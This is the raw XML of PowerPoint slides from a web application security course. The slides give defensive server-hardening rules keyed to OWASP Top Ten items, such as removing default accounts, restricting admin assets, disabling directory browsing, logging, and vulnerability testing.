        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>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098" y="1752600"/>
            <a:ext cx="7707086" cy="4495800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4984269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#5 (A5++)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disable unneeded functionality/extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you need FTP? WebDAV?  CGI? ASP.NET? Server-Side Includes? Ensure that ALL such extensions that your app DOESN’T use are set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PROHIBIT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reduce potential “attack surface” by removing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34836729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#6 (A5)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ensure all “default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>or “sample” user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>accounts, passwords, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>physically removed from your system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>well known, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will try them </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sample programs are NOT rigorous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use non-obvious names for admin accounts 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers will try “admin”, “administrator”, “boss”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14418715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#7 (A5,A6)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>non-web data (configuration, log files, etc.) must be OUTSIDE of the web root directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t expose any information that a cybercriminal might leverage into an exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28997990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#8 (A4)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>all testing and admin assets in separate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t intermingle production, test, and admin assets in the same directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t include any links to these assets from “normal” web pages </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…and DON’T name the directories obvious names like “/admin” and “/test”!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29703803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#9 (A6,A5)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>deploy test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>assets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to production at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Should not be needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can leak information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8143752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#10 (A7)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Restrict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>access to admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>assets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verify that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>each and every  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>admin assets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>authentication (no sneaking in allowed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even safer: Admin functions could be located on a separate web server accessible ONLY locally. (Production app accessible from “outside” would have NO admin assets at all….)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31992831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#11 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TEST –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use vulnerability testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AppScan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Qualys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Verify SSL encryption correct suites	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1329663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12 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remove all “default” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sample code, some frameworks/components/hardware, etc., supply default credentials. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Be sure to remove or change them!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26404578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13</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disable “directory browsing”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web servers should never divulge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>the contents of their directories.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26774291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Infrastructure Rule #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LOGS!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Log all activities occurring on your site, including web, database, and business logic, if possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ensure that your logs have enough information to be helpful</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4250924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Start?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Because data sanitization represents 3 of the 10 items in the top ten and represent a large percentage of the vulnerabilities, we’ll start there…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40259816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Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>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42022434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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1371600"/>
            <a:ext cx="8153400" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All data is suspect – validate/sanitize</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(incoming and outgoing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server validation/sanitization ALWAYS REQUIRED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client validation desirable for performance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use POST (not GET)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avoid AUTOCOMPLETE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Viewstate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (.NET)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enforce reasonable expirations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> change = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22370040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(cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1524000"/>
            <a:ext cx="8153400" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not cache HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No links to admin/test assets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use strong passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use Parameterized SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remove comments from production code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Be careful with redirect/forward</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avoid foreign assets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Turn off all debugging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keep software up-to-date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use TLS (TLS1.2, if you have it)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2452356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(cont’d)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keep certificates up-to-date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disable unneeded functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remove all default/sample IDs and programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only web assets in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Test/admin assets in separate directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t deploy test assets to production</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make access to admin assets as difficult as possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use vulnerability testing - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AppScan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Qualys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18964883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References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>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448990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sz="quarter" idx="13"/>
